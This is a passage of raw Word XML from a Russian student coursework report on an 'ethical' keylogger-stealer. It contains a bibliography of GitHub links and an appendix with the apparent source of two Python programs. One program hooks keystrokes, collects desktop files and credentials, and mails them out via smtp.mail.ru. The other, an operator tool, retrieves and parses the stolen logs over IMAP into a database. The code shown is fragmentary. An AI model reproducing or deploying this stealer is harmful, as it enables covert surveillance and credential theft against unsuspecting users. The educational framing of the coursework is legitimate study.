      <w:r w:rsidR="00F431EF" w:rsidRPr="00F431EF">
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DF303D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00F431EF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ithub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F431EF" w:rsidRPr="00F431EF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F431EF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidR="00F431EF" w:rsidRPr="00F431EF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00573C07">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00573C07" w:rsidRPr="00F431EF">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidR="00573C07" w:rsidRPr="00CB245C">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https</w:t>
        </w:r>
        <w:r w:rsidR="00573C07" w:rsidRPr="00F431EF">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00573C07" w:rsidRPr="00CB245C">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>github</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00573C07" w:rsidRPr="00F431EF">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00573C07" w:rsidRPr="00CB245C">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>com</w:t>
        </w:r>
        <w:r w:rsidR="00573C07" w:rsidRPr="00F431EF">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="00573C07" w:rsidRPr="00CB245C">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ShadowLance</w:t>
        </w:r>
        <w:r w:rsidR="00573C07" w:rsidRPr="00F431EF">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>2/</w:t>
        </w:r>
        <w:r w:rsidR="00573C07" w:rsidRPr="00CB245C">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Course</w:t>
        </w:r>
        <w:r w:rsidR="00573C07" w:rsidRPr="00F431EF">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>_</w:t>
        </w:r>
        <w:r w:rsidR="00573C07" w:rsidRPr="00CB245C">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Work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Ethical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Keylogger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Stealer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00573C07" w:rsidRPr="00F431EF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00573C07" w:rsidRPr="007E3853">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00573C07">
        <w:t>Дата обращения</w:t>
      </w:r>
      <w:r w:rsidR="00573C07" w:rsidRPr="007E3853">
        <w:t>: 12.01.2024)</w:t>
      </w:r>
      <w:r w:rsidR="00F431EF" w:rsidRPr="00F431EF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6042733C" w14:textId="13E2A225" w:rsidR="00573C07" w:rsidRPr="00F431EF" w:rsidRDefault="007E3853" w:rsidP="0015575C">
      <w:r w:rsidRPr="007E3853">
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ER</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3853">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>Диаграмма БД</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3853">
        <w:t>: [</w:t>
      </w:r>
      <w:r>
        <w:t>Электронный ресурс.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3853">
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F431EF" w:rsidRPr="00F431EF">
        <w:t xml:space="preserve"> // </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F431EF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F431EF" w:rsidRPr="007E3853">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F431EF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>designer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F431EF" w:rsidRPr="00F431EF">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F431EF">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="00CB245C">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https</w:t>
        </w:r>
        <w:r w:rsidRPr="00F431EF">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00CB245C">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>dbdesigner</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/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page</w:t>
        </w:r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link</w:t>
        </w:r>
        <w:r w:rsidRPr="00F431EF">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00CB245C">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qf</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00F431EF">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r w:rsidRPr="00CB245C">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>u</w:t>
        </w:r>
        <w:r w:rsidRPr="00F431EF">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00CB245C">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Gco</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00F431EF">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00CB245C">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>GMcPkik</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00F431EF">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F431EF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00F431EF" w:rsidRPr="00F431EF">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00F431EF">
        <w:t>Дата обращения 12.01.2024</w:t>
      </w:r>
      <w:r w:rsidR="00F431EF" w:rsidRPr="00F431EF">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125F6E18" w14:textId="1EF3E354" w:rsidR="00F431EF" w:rsidRDefault="00F431EF" w:rsidP="0015575C">
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="00DF303D">
        <w:t xml:space="preserve">Функциональные диаграммы </w:t>
      </w:r>
      <w:r w:rsidR="00DF303D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:r w:rsidR="00DF303D" w:rsidRPr="00DF303D">
        <w:t>: диаграмма прецедентов UML, диаграмма состояний UML</w:t>
      </w:r>
      <w:r w:rsidR="00DF303D" w:rsidRPr="00573C07">
        <w:t>: [</w:t>
      </w:r>
      <w:r w:rsidR="00DF303D">
        <w:t>Электронный ресурс.</w:t>
      </w:r>
      <w:r w:rsidR="00DF303D" w:rsidRPr="00573C07">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00DF303D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00DF303D" w:rsidRPr="00F431EF">
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DF303D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DF303D" w:rsidRPr="00F431EF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DF303D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidR="00DF303D" w:rsidRPr="00F431EF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00DF303D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00DF303D" w:rsidRPr="00F431EF">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00DF303D" w:rsidRPr="00DF303D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidR="00DF303D" w:rsidRPr="00DF303D">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>https://github.com/ShadowLance2/Course_Work-Ethical-Keylogger-Stealer/blob/main/Проектировщик/Функциональные%20диаграммы%20(Диаграмма%20прецедентов%2C%20диаграмма%20состояний%20)UML.drawio</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DF303D" w:rsidRPr="00F431EF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00DF303D" w:rsidRPr="00DF303D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF303D" w:rsidRPr="007E3853">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00DF303D">
        <w:t>Дата обращения</w:t>
      </w:r>
      <w:r w:rsidR="00DF303D" w:rsidRPr="007E3853">
        <w:t>: 12.01.2024)</w:t>
      </w:r>
      <w:r w:rsidR="00DF303D" w:rsidRPr="00F431EF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BF93CE" w14:textId="4BCD0B24" w:rsidR="00DF303D" w:rsidRDefault="00DF303D" w:rsidP="00DF303D">
      <w:r w:rsidRPr="00DF303D">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Диаграмма последовательности </w:t>
      </w:r>
      <w:r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Pr="00DF303D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="00DF303D">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>https://github.com/ShadowLance2/Course_Work-Ethical-Keylogger-Stealer/blob/main/Проектировщик/Диаграмма%20последовательности%20UML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3238F62" w14:textId="582C7F36" w:rsidR="00DF303D" w:rsidRDefault="00DF303D" w:rsidP="00DF303D">
      <w:r w:rsidRPr="00DF303D">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>. Концептуальная модель БД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1" w:history="1">
        <w:r w:rsidRPr="00DF303D">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>https://github.com/ShadowLance2/Course_Work-Ethical-Keylogger-Stealer/blob/main/Проектировщик/Концептуальная%20модель%20БД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AFC1EF0" w14:textId="4F92E8A9" w:rsidR="00DF303D" w:rsidRDefault="00DF303D" w:rsidP="00DF303D">
      <w:r>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidR="00A57299">
        <w:t xml:space="preserve">Диаграмма пакетов </w:t>
      </w:r>
      <w:r w:rsidR="00A57299"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="00A57299" w:rsidRPr="00A57299">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidR="00A57299" w:rsidRPr="00A57299">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https</w:t>
        </w:r>
        <w:r w:rsidR="00A57299" w:rsidRPr="00A57299">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00A57299" w:rsidRPr="00A57299">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>github</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00A57299" w:rsidRPr="00A57299">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00A57299" w:rsidRPr="00A57299">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>com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ShadowLance</w:t>
        </w:r>
        <w:r w:rsidR="00A57299" w:rsidRPr="00A57299">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>2/</w:t>
        </w:r>
        <w:r w:rsidR="00A57299" w:rsidRPr="00A57299">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Course</w:t>
        </w:r>
        <w:r w:rsidR="00A57299" w:rsidRPr="00A57299">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>_</w:t>
        </w:r>
        <w:r w:rsidR="00A57299" w:rsidRPr="00A57299">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Work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Ethical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Keylogger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Stealer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blob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main</w:t>
        </w:r>
        <w:r w:rsidR="00A57299" w:rsidRPr="00A57299">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>/Разработчик/Диаграмма%20пакетов%20</w:t>
        </w:r>
        <w:r w:rsidR="00A57299" w:rsidRPr="00A57299">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>UML</w:t>
        </w:r>
        <w:r w:rsidR="00A57299" w:rsidRPr="00A57299">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00A57299" w:rsidRPr="00A57299">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>drawio</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/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22AE02CD" w14:textId="529368A0" w:rsidR="00DF303D" w:rsidRDefault="005E0339" w:rsidP="006331F4">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>7. Функциональная диаграмма продукта как он видится (Руководитель)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3" w:history="1">
        <w:r w:rsidRPr="005E0339">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>https://github.com/ShadowLance2/Course_Work-Ethical-Keylogger-Stealer/blob/main/Руководитель/Функциональная%20диаграмма%20продукта%20как%20он%20видится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7C2197FD" w14:textId="5DC6304F" w:rsidR="006331F4" w:rsidRDefault="00376C95" w:rsidP="00376C95">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc155993253"/>
      <w:bookmarkStart w:id="42" w:name="_Toc155993735"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение А</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="173830BA" w14:textId="57C598E8" w:rsidR="00376C95" w:rsidRPr="006875BD" w:rsidRDefault="00562A50" w:rsidP="006875BD">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Полный к</w:t>
      </w:r>
      <w:r w:rsidR="006875BD" w:rsidRPr="006875BD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>од программ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2E186F" w14:textId="0EA6F87D" w:rsidR="006875BD" w:rsidRDefault="009842D0" w:rsidP="006875BD">
      <w:r>
        <w:t>В приложении А представлен</w:t>
      </w:r>
      <w:r w:rsidR="00417C36">
        <w:t xml:space="preserve"> полный код</w:t>
      </w:r>
      <w:r w:rsidR="00D94EDE">
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r w:rsidR="00467DD2">
        <w:t>языке программирования</w:t>
      </w:r>
      <w:r w:rsidR="00D94EDE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D94EDE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidR="00D94EDE" w:rsidRPr="00D94EDE">
        <w:t xml:space="preserve"> 3.9</w:t>
      </w:r>
      <w:r w:rsidR="00417C36">
        <w:t xml:space="preserve"> обеих программ получившегося продукта.</w:t>
      </w:r>
      <w:r w:rsidR="00D94EDE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4960E40B" w14:textId="2FC9B014" w:rsidR="00417C36" w:rsidRPr="00733078" w:rsidRDefault="00417C36" w:rsidP="006875BD">
      <w:r w:rsidRPr="00733078">
        <w:t>Код программы «Stealer_Keylogger.py»:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6774C68E" w14:textId="4DD7016E" w:rsidR="00417C36" w:rsidRPr="00F92270" w:rsidRDefault="00733078" w:rsidP="00F92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явление глобальных переменных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тправки электронной почт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Subject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n\n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.SMT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mtp.mail.ru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87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tarttl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log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end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qui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для </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ирования</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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и по алгоритму MD5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hashlib.md5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encod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.hexdiges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бработки файлов на рабочем столе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ktop_pat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envir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PROFILE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_to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и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_list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redential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gin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ccount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name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re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redentials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orage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cess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ны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ы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ы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а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и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а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ы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le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p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proofErr w:type="spellEnd"/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51177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int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7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proofErr w:type="spellEnd"/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5117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117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117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и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DOW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replac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nam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is_presse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sc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unhook_al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stri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H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log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а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бинац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entation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ertical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ail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mail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те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йлоггер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ы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run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F72C61C" w14:textId="77777777" w:rsidR="00EB2683" w:rsidRPr="00FC1C35" w:rsidRDefault="00EB2683" w:rsidP="00733078">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48F6631C" w14:textId="26B8ED42" w:rsidR="00733078" w:rsidRDefault="00733078" w:rsidP="00733078">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00733078">
        <w:t>Код</w:t>
      </w:r>
      <w:r w:rsidRPr="00733078">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00733078">
        <w:t>программы</w:t>
      </w:r>
      <w:r w:rsidRPr="00733078">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> «Administrator_Interface_Tools.py»:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AED925" w14:textId="77777777" w:rsidR="006E68B0" w:rsidRPr="006E68B0" w:rsidRDefault="006E68B0" w:rsidP="006E68B0">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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ap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Ap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ox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textinp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utton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Button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label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Labe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bs4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imaplib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emai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sycopg2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psycopg2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ql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scrollview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grid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popu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opu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clock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Clock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class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App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r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="FFC66D"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>build</w:t>
      </w:r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Адрес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электронно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ы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True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звлеч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Вста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у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layou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table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all_tabl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tabl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table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button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Показать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size_hint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 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t=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table</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(t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button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ступ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layout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онтен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tent):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        blocks = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>content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 xml:space="preserve">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block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locks:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            lines = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>block.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>().split(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data = {}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parts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 xml:space="preserve">(parts) == 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ke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 = parts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rts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data[key] = value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 xml:space="preserve">"Message-ID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Content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Body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Content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8888C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>enumerate</w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(lines)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line.startswit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Body: EHP"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A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="CC7832"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>break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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>body = (</w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                    lines[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>].split(</w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Body: EHP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[-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!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data.appe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6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f"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body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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>filtered_file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file.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(data 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get_all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mail = imaplib.IMAP4_SSL(</w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'imap.mail.ru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99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in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sele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box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searc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 xml:space="preserve">None, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"ALL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emails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um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plit():</w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    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fetch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(num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(RFC822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msg = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>email.message_from_bytes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MessageId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body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text_from_email</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(msg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dentifier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ody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emails.append</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>({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 xml:space="preserve">: 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msg[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>]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: msg[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Body"</w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: body}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ou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email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72737A"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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екс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ьма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text_from_emai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sg):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        body =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msg.is_multipart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part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msg.walk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part.get_content_typ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payload = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>part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plain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body += payload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html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soup =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t>(payloa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html.parser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body += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>soup.get_tex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e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payload = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="A9B7C6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msg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body += payload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body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ave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mails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email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email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Message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E68B0">
        <w:rPr>
          <w:color w:val="6A8759"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-ID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Message-ID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Content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Date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Body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Body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username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.text</w:t>
      </w:r>
